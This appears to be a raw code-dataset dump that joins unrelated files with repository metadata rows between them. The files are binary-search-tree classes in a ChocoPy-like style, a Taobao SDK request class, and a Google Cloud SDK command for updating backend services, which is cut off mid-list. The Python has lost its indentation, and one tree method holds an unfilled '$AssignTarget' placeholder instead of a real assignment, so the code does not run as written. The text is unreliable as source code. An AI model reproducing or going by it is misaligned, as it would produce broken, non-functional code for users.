return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode3(object):
value:int = 0
value2:int = 0
value3:int = 0
left:"TreeNode3" = None
left2:"TreeNode3" = None
left3:"TreeNode3" = None
right:"TreeNode3" = None
right2:"TreeNode3" = None
right3:"TreeNode3" = None
def insert(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode5(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
value5:int = 0
left:"TreeNode5" = None
left2:"TreeNode5" = None
left3:"TreeNode5" = None
left4:"TreeNode5" = None
left5:"TreeNode5" = None
right:"TreeNode5" = None
right2:"TreeNode5" = None
right3:"TreeNode5" = None
right4:"TreeNode5" = None
right5:"TreeNode5" = None
def insert(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
$AssignTarget makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree2(object):
root:TreeNode2 = None
root2:TreeNode2 = None
size:int = 0
size2:int = 0
def insert(self:"Tree2", x:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree2", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree2", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree2", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree3(object):
root:TreeNode3 = None
root2:TreeNode3 = None
root3:TreeNode3 = None
size:int = 0
size2:int = 0
size3:int = 0
def insert(self:"Tree3", x:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree3", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree3", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree3", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree4(object):
root:TreeNode4 = None
root2:TreeNode4 = None
root3:TreeNode4 = None
root4:TreeNode4 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
def insert(self:"Tree4", x:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree4", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree4", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree4", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree5(object):
root:TreeNode5 = None
root2:TreeNode5 = None
root3:TreeNode5 = None
root4:TreeNode5 = None
root5:TreeNode5 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
size5:int = 0
def insert(self:"Tree5", x:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree5", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree5", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree5", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
b:TreeNode = None
b = TreeNode()
b.value = x
return b
def makeNode2(x: int, x2: int) -> TreeNode2:
b:TreeNode2 = None
b2:TreeNode2 = None
b = TreeNode2()
b.value = x
return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
b:TreeNode3 = None
b2:TreeNode3 = None
b3:TreeNode3 = None
b = TreeNode3()
b.value = x
return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
b:TreeNode4 = None
b2:TreeNode4 = None
b3:TreeNode4 = None
b4:TreeNode4 = None
b = TreeNode4()
b.value = x
return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
b:TreeNode5 = None
b2:TreeNode5 = None
b3:TreeNode5 = None
b4:TreeNode5 = None
b5:TreeNode5 = None
b = TreeNode5()
b.value = x
return b
# Input parameters
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
|
[
"[email protected]"
] | |
62f3947d4ae61f1cc720aa085837534f53774018
|
e1b8fb9a5500516f28d3d7e9a5f259c49ef35f14
|
/top/api/rest/InventoryAdjustTradeRequest.py
|
4da3e858af12147c95f9d7d992b46d0d33f834f9
|
[] |
no_license
|
htom78/taobao_comet_py
|
9224dbca1a413a54bcc5569873e4c7a9fc9ba059
|
ad8b2e983a14d3ab7665244449f79dd72f390815
|
refs/heads/master
| 2020-05-17T10:47:28.369191 | 2013-08-27T08:50:59 | 2013-08-27T08:50:59 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 406 |
py
|
'''
Created by auto_sdk on 2013-06-16 16:36:02
'''
from top.api.base import RestApi
class InventoryAdjustTradeRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.biz_unique_code = None
self.items = None
self.operate_time = None
self.tb_order_type = None
def getapiname(self):
return 'taobao.inventory.adjust.trade'
|
[
"[email protected]"
] | |
0b26e25eaff5eb07e0f7ffca2f3c21ca70e5b883
|
d83fde3c891f44014f5339572dc72ebf62c38663
|
/_bin/google-cloud-sdk/.install/.backup/lib/surface/compute/backend_services/update.py
|
5ac0c70891053536c799b46d3a0388628a07d629
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
gyaresu/dotfiles
|
047cc3ca70f4b405ba272856c69ee491a79d2ebe
|
e5e533b3a081b42e9492b228f308f6833b670cfe
|
refs/heads/master
| 2022-11-24T01:12:49.435037 | 2022-11-01T16:58:13 | 2022-11-01T16:58:13 | 17,139,657 | 1 | 1 | null | 2020-07-25T14:11:43 | 2014-02-24T14:59:59 |
Python
|
UTF-8
|
Python
| false | false | 19,001 |
py
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Commands for updating backend services.
There are separate alpha, beta, and GA command classes in this file.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from apitools.base.py import encoding
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.api_lib.compute.backend_services import (
client as backend_service_client)
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute import signed_url_flags
from googlecloudsdk.command_lib.compute.backend_services import backend_services_utils
from googlecloudsdk.command_lib.compute.backend_services import flags
from googlecloudsdk.command_lib.compute.security_policies import (
flags as security_policy_flags)
from googlecloudsdk.core import log
from googlecloudsdk.core import resources as resources_exceptions
def AddIapFlag(parser):
# TODO(b/34479878): It would be nice if the auto-generated help text were
# a bit better so we didn't need to be quite so verbose here.
flags.AddIap(
parser,
help="""\
Change the Identity Aware Proxy (IAP) service configuration for the
backend service. You can set IAP to 'enabled' or 'disabled', or modify
the OAuth2 client configuration (oauth2-client-id and
oauth2-client-secret) used by IAP. If any fields are unspecified, their
values will not be modified. For instance, if IAP is enabled,
'--iap=disabled' will disable IAP, and a subsequent '--iap=enabled' will
then enable it with the same OAuth2 client configuration as the first
time it was enabled. See
https://cloud.google.com/iap/ for more information about this feature.
""")
@base.ReleaseTracks(base.ReleaseTrack.GA)
class UpdateGA(base.UpdateCommand):
"""Update a backend service.
*{command}* is used to update backend services.
"""
HEALTH_CHECK_ARG = None
HTTP_HEALTH_CHECK_ARG = None
HTTPS_HEALTH_CHECK_ARG = None
@classmethod
def Args(cls, parser):
flags.GLOBAL_REGIONAL_BACKEND_SERVICE_ARG.AddArgument(
parser, operation_type='update')
flags.AddDescription(parser)
cls.HEALTH_CHECK_ARG = flags.HealthCheckArgument()
cls.HEALTH_CHECK_ARG.AddArgument(parser, cust_metavar='HEALTH_CHECK')
cls.HTTP_HEALTH_CHECK_ARG = flags.HttpHealthCheckArgument()
cls.HTTP_HEALTH_CHECK_ARG.AddArgument(
parser, cust_metavar='HTTP_HEALTH_CHECK')
cls.HTTPS_HEALTH_CHECK_ARG = flags.HttpsHealthCheckArgument()
cls.HTTPS_HEALTH_CHECK_ARG.AddArgument(
parser, cust_metavar='HTTPS_HEALTH_CHECK')
flags.AddTimeout(parser, default=None)
flags.AddPortName(parser)
flags.AddProtocol(parser, default=None)
flags.AddEnableCdn(parser, default=None)
flags.AddSessionAffinity(parser, internal_lb=True)
flags.AddAffinityCookieTtl(parser)
flags.AddConnectionDrainingTimeout(parser)
flags.AddCacheKeyIncludeProtocol(parser, default=None)
flags.AddCacheKeyIncludeHost(parser, default=None)
flags.AddCacheKeyIncludeQueryString(parser, default=None)
flags.AddCacheKeyQueryStringList(parser)
AddIapFlag(parser)
def _CreateSetSecurityPoliciesRequest(self, client, backend_service_ref,
security_policy_ref):
backend_service = backend_service_client.BackendService(
backend_service_ref, compute_client=client)
return backend_service.SetSecurityPolicy(
security_policy=security_policy_ref, only_generate_request=True)
def GetGetRequest(self, client, backend_service_ref):
"""Create Backend Services get request."""
if backend_service_ref.Collection() == 'compute.regionBackendServices':
return (
client.apitools_client.regionBackendServices,
'Get',
client.messages.ComputeRegionBackendServicesGetRequest(
project=backend_service_ref.project,
region=backend_service_ref.region,
backendService=backend_service_ref.Name()))
return (
client.apitools_client.backendServices,
'Get',
client.messages.ComputeBackendServicesGetRequest(
project=backend_service_ref.project,
backendService=backend_service_ref.Name()))
def GetSetRequest(self, client, backend_service_ref, replacement):
"""Create Backend Services set request."""
if backend_service_ref.Collection() == 'compute.regionBackendServices':
return (
client.apitools_client.regionBackendServices,
'Update',
client.messages.ComputeRegionBackendServicesUpdateRequest(
project=backend_service_ref.project,
region=backend_service_ref.region,
backendService=backend_service_ref.Name(),
backendServiceResource=replacement))
return (
client.apitools_client.backendServices,
'Update',
client.messages.ComputeBackendServicesUpdateRequest(
project=backend_service_ref.project,
backendService=backend_service_ref.Name(),
backendServiceResource=replacement))
def Modify(self, client, resources, args, existing):
"""Modify Backend Service."""
replacement = encoding.CopyProtoMessage(existing)
if args.connection_draining_timeout is not None:
replacement.connectionDraining = client.messages.ConnectionDraining(
drainingTimeoutSec=args.connection_draining_timeout)
if args.description:
replacement.description = args.description
elif args.description is not None:
replacement.description = None
health_checks = flags.GetHealthCheckUris(args, self, resources)
if health_checks:
replacement.healthChecks = health_checks
if args.timeout:
replacement.timeoutSec = args.timeout
if args.port_name:
replacement.portName = args.port_name
if args.protocol:
replacement.protocol = (client.messages.BackendService
.ProtocolValueValuesEnum(args.protocol))
if args.enable_cdn is not None:
replacement.enableCDN = args.enable_cdn
if args.session_affinity is not None:
replacement.sessionAffinity = (
client.messages.BackendService.SessionAffinityValueValuesEnum(
args.session_affinity))
if args.affinity_cookie_ttl is not None:
replacement.affinityCookieTtlSec = args.affinity_cookie_ttl
backend_services_utils.ApplyCdnPolicyArgs(
client, args, replacement, is_update=True)
self._ApplyIapArgs(client, args.iap, existing, replacement)
return replacement
def ValidateArgs(self, args):
"""Validate arguments."""
if not any([
args.affinity_cookie_ttl is not None,
args.connection_draining_timeout is not None,
args.description is not None,
args.enable_cdn is not None,
args.cache_key_include_protocol is not None,
args.cache_key_include_host is not None,
args.cache_key_include_query_string is not None,
args.cache_key_query_string_whitelist is not None,
args.cache_key_query_string_blacklist is not None,
args.health_checks,
args.http_health_checks,
args.https_health_checks,
args.IsSpecified('iap'),
args.port_name,
args.protocol,
args.session_affinity is not None,
args.timeout is not None,
]):
raise exceptions.ToolException('At least one property must be modified.')
def Run(self, args):
"""Issues requests necessary to update the Backend Services."""
self.ValidateArgs(args)
holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
client = holder.client
backend_service_ref = (
flags.GLOBAL_REGIONAL_BACKEND_SERVICE_ARG.ResolveAsResource(
args,
holder.resources,
scope_lister=compute_flags.GetDefaultScopeLister(client)))
get_request = self.GetGetRequest(client, backend_service_ref)
objects = client.MakeRequests([get_request])
new_object = self.Modify(client, holder.resources, args, objects[0])
# If existing object is equal to the proposed object or if
# Modify() returns None, then there is no work to be done, so we
# print the resource and return.
if objects[0] == new_object:
# Only skip push if security_policy is not set.
if getattr(args, 'security_policy', None) is None:
log.status.Print(
'No change requested; skipping update for [{0}].'.format(
objects[0].name))
return objects
requests = []
else:
requests = [self.GetSetRequest(client, backend_service_ref, new_object)]
# Empty string is a valid value.
if getattr(args, 'security_policy', None) is not None:
try:
security_policy_ref = self.SECURITY_POLICY_ARG.ResolveAsResource(
args, holder.resources).SelfLink()
# If security policy is an empty string we should clear the current policy
except resources_exceptions.InvalidResourceException:
security_policy_ref = None
requests += self._CreateSetSecurityPoliciesRequest(
client, backend_service_ref, security_policy_ref)
return client.MakeRequests(requests)
def _ApplyIapArgs(self, client, iap_arg, existing, replacement):
if iap_arg is not None:
existing_iap = existing.iap
replacement.iap = backend_services_utils.GetIAP(
iap_arg, client.messages, existing_iap_settings=existing_iap)
if replacement.iap.enabled and not (existing_iap and
existing_iap.enabled):
log.warning(backend_services_utils.IapBestPracticesNotice())
if (replacement.iap.enabled and replacement.protocol is not
client.messages.BackendService.ProtocolValueValuesEnum.HTTPS):
log.warning(backend_services_utils.IapHttpWarning())
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class UpdateAlpha(UpdateGA):
"""Update a backend service.
*{command}* is used to update backend services.
"""
HEALTH_CHECK_ARG = None
HTTP_HEALTH_CHECK_ARG = None
HTTPS_HEALTH_CHECK_ARG = None
SECURITY_POLICY_ARG = None
@classmethod
def Args(cls, parser):
flags.GLOBAL_REGIONAL_BACKEND_SERVICE_ARG.AddArgument(
parser, operation_type='update')
flags.AddDescription(parser)
cls.HEALTH_CHECK_ARG = flags.HealthCheckArgument()
cls.HEALTH_CHECK_ARG.AddArgument(parser, cust_metavar='HEALTH_CHECK')
cls.HTTP_HEALTH_CHECK_ARG = flags.HttpHealthCheckArgument()
cls.HTTP_HEALTH_CHECK_ARG.AddArgument(
parser, cust_metavar='HTTP_HEALTH_CHECK')
cls.HTTPS_HEALTH_CHECK_ARG = flags.HttpsHealthCheckArgument()
cls.HTTPS_HEALTH_CHECK_ARG.AddArgument(
parser, cust_metavar='HTTPS_HEALTH_CHECK')
cls.SECURITY_POLICY_ARG = (
security_policy_flags.SecurityPolicyArgumentForTargetResource(
resource='backend service'))
cls.SECURITY_POLICY_ARG.AddArgument(parser)
flags.AddTimeout(parser, default=None)
flags.AddPortName(parser)
flags.AddProtocol(
parser,
default=None,
choices=['HTTP', 'HTTPS', 'HTTP2', 'SSL', 'TCP', 'UDP'])
flags.AddConnectionDrainingTimeout(parser)
flags.AddEnableCdn(parser, default=None)
flags.AddCacheKeyIncludeProtocol(parser, default=None)
flags.AddCacheKeyIncludeHost(parser, default=None)
flags.AddCacheKeyIncludeQueryString(parser, default=None)
flags.AddCacheKeyQueryStringList(parser)
flags.AddSessionAffinity(parser, internal_lb=True)
flags.AddAffinityCookieTtl(parser)
signed_url_flags.AddSignedUrlCacheMaxAge(
parser, required=False, unspecified_help='')
flags.AddConnectionDrainOnFailover(parser, default=None)
flags.AddDropTrafficIfUnhealthy(parser, default=None)
flags.AddFailoverRatio(parser)
AddIapFlag(parser)
flags.AddCustomRequestHeaders(parser, remove_all_flag=True, default=None)
def Modify(self, client, resources, args, existing):
"""Modify Backend Service."""
replacement = super(UpdateAlpha, self).Modify(client, resources, args,
existing)
if args.connection_draining_timeout is not None:
replacement.connectionDraining = client.messages.ConnectionDraining(
drainingTimeoutSec=args.connection_draining_timeout)
if args.no_custom_request_headers is not None:
replacement.customRequestHeaders = []
if args.custom_request_header is not None:
replacement.customRequestHeaders = args.custom_request_header
backend_services_utils.ApplyCdnPolicyArgs(
client,
args,
replacement,
is_update=True,
apply_signed_url_cache_max_age=True)
backend_services_utils.ApplyFailoverPolicyArgs(client.messages, args,
replacement)
return replacement
def ValidateArgs(self, args):
"""Validate arguments."""
if not any([
args.affinity_cookie_ttl is not None,
args.connection_draining_timeout is not None,
args.no_custom_request_headers is not None,
args.custom_request_header is not None,
args.description is not None,
args.enable_cdn is not None,
args.cache_key_include_protocol is not None,
args.cache_key_include_host is not None,
args.cache_key_include_query_string is not None,
args.cache_key_query_string_whitelist is not None,
args.cache_key_query_string_blacklist is not None,
args.IsSpecified('signed_url_cache_max_age'),
args.http_health_checks,
args.IsSpecified('iap'),
args.port_name,
args.protocol,
args.security_policy is not None,
args.session_affinity is not None,
args.timeout is not None,
args.connection_drain_on_failover is not None,
args.drop_traffic_if_unhealthy is not None,
args.failover_ratio,
getattr(args, 'health_checks', None),
getattr(args, 'https_health_checks', None),
]):
raise exceptions.ToolException('At least one property must be modified.')
def GetSetRequest(self, client, backend_service_ref, replacement):
if (backend_service_ref.Collection() == 'compute.backendServices') and (
replacement.failoverPolicy):
raise exceptions.InvalidArgumentException(
'--global',
'cannot specify failover policies for global backend services.')
return super(UpdateAlpha, self).GetSetRequest(client, backend_service_ref,
replacement)
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class UpdateBeta(UpdateGA):
"""Update a backend service.
*{command}* is used to update backend services.
"""
HEALTH_CHECK_ARG = None
HTTP_HEALTH_CHECK_ARG = None
HTTPS_HEALTH_CHECK_ARG = None
SECURITY_POLICY_ARG = None
@classmethod
def Args(cls, parser):
flags.GLOBAL_REGIONAL_BACKEND_SERVICE_ARG.AddArgument(
parser, operation_type='update')
flags.AddDescription(parser)
cls.HEALTH_CHECK_ARG = flags.HealthCheckArgument()
cls.HEALTH_CHECK_ARG.AddArgument(parser, cust_metavar='HEALTH_CHECK')
cls.HTTP_HEALTH_CHECK_ARG = flags.HttpHealthCheckArgument()
cls.HTTP_HEALTH_CHECK_ARG.AddArgument(
parser, cust_metavar='HTTP_HEALTH_CHECK')
cls.HTTPS_HEALTH_CHECK_ARG = flags.HttpsHealthCheckArgument()
cls.HTTPS_HEALTH_CHECK_ARG.AddArgument(
parser, cust_metavar='HTTPS_HEALTH_CHECK')
cls.SECURITY_POLICY_ARG = (
security_policy_flags.SecurityPolicyArgumentForTargetResource(
resource='backend service'))
cls.SECURITY_POLICY_ARG.AddArgument(parser)
flags.AddTimeout(parser, default=None)
flags.AddPortName(parser)
flags.AddProtocol(parser, default=None)
flags.AddConnectionDrainingTimeout(parser)
flags.AddEnableCdn(parser, default=None)
flags.AddSessionAffinity(parser, internal_lb=True)
flags.AddAffinityCookieTtl(parser)
AddIapFlag(parser)
flags.AddCacheKeyIncludeProtocol(parser, default=None)
flags.AddCacheKeyIncludeHost(parser, default=None)
flags.AddCacheKeyIncludeQueryString(parser, default=None)
flags.AddCacheKeyQueryStringList(parser)
flags.AddCustomRequestHeaders(parser, remove_all_flag=True, default=None)
signed_url_flags.AddSignedUrlCacheMaxAge(
parser, required=False, unspecified_help='')
def Modify(self, client, resources, args, existing):
"""Modify Backend Service."""
replacement = super(UpdateBeta, self).Modify(client, resources, args,
existing)
if args.connection_draining_timeout is not None:
replacement.connectionDraining = client.messages.ConnectionDraining(
drainingTimeoutSec=args.connection_draining_timeout)
if args.no_custom_request_headers is not None:
replacement.customRequestHeaders = []
if args.custom_request_header is not None:
replacement.customRequestHeaders = args.custom_request_header
backend_services_utils.ApplyCdnPolicyArgs(
client,
args,
replacement,
is_update=True,
apply_signed_url_cache_max_age=True)
return replacement
def ValidateArgs(self, args):
"""Validate arguments."""
if not any([
args.affinity_cookie_ttl is not None,
args.connection_draining_timeout is not None,
args.no_custom_request_headers is not None,
args.custom_request_header is not None,
args.description is not None,
args.enable_cdn is not None,
args.cache_key_include_protocol is not None,
args.cache_key_include_host is not None,
args.cache_key_include_query_string is not None,
args.cache_key_query_string_whitelist is not None,
args.cache_key_query_string_blacklist is not None,
args.health_checks,
args.http_health_checks,
args.https_health_checks,
args.IsSpecified('iap'),
args.port_name,
args.protocol,
args.security_policy is not None,
args.session_affinity is not None,
args.IsSpecified('signed_url_cache_max_age'),
args.timeout is not None,
